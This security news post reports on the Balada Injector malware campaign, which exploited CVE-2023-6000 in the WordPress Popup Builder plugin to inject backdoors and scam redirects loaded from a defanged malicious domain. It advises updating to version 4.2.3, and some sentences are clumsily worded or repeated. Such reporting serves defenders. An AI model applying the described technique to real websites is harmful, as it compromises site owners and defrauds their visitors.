What are some common cyber security threats?
January 9, 2024
Invoice Phishing Alert, TA866 Deploys Malware Duo
January 23, 2024
The GoDaddy-owned website security company, over 7,100 WordPress sites have been infected by the Balada Injector malware. The malware exploits a vulnerability in the Popup Builder plugin, which has more than 200,000 active installs, to inject backdoors that redirect visitors of infected sites to bogus tech support pages, fraudulent lottery wins, and push notification scams. The malware has been active since 2017 and has infiltrated no less than 1 million sites since then.
The Balada Injector campaign takes place in a series of periodic attack waves, weaponizing security flaws in WordPress plugins to inject backdoors designed to redirect visitors of infected sites to fraudulent pages. The malware is said to have been active since 2017 and infiltrated no less than 1 million sites since then. The GoDaddy-owned website security company, Sucuri, detected the latest Balada Injector activity on December 13, 2023, and identified the injections on over 7,100 sites.
The malware takes advantage of a high-severity flaw in Popup Builder (CVE-2023-6000, CVSS score: 8.8) – a plugin with more than 200,000 active installs – that was publicly disclosed by WPScan a day before. The issue was addressed in version 4.2.3.
When successfully exploited, this vulnerability they can gain the same level of control over the website as the logged-in administrator they've targeted. This means they can essentially do anything the administrator can do, including installing any plugins they want and even creating new administrator accounts under their control," warns WPScan researcher Marc Montpas said.
The main objective of the Balada Injector malware campaign is to insert a malicious JavaScript file hosted on specialcraftbox[.]com into the infected website. This file is then used to take control of the website and load additional JavaScript, which is used to facilitate malicious redirects
In conclusion, the Balada Injector malware has been active since 2017 and has infiltrated no less than 1 million sites since then. The malware exploits a vulnerability in the Popup Builder plugin to inject backdoors that redirect visitors of infected sites to fraudulent pages. It is recommended that WordPress site owners update their Popup Builder plugin to version 4.2.3 or later to avoid falling victim to this malware.
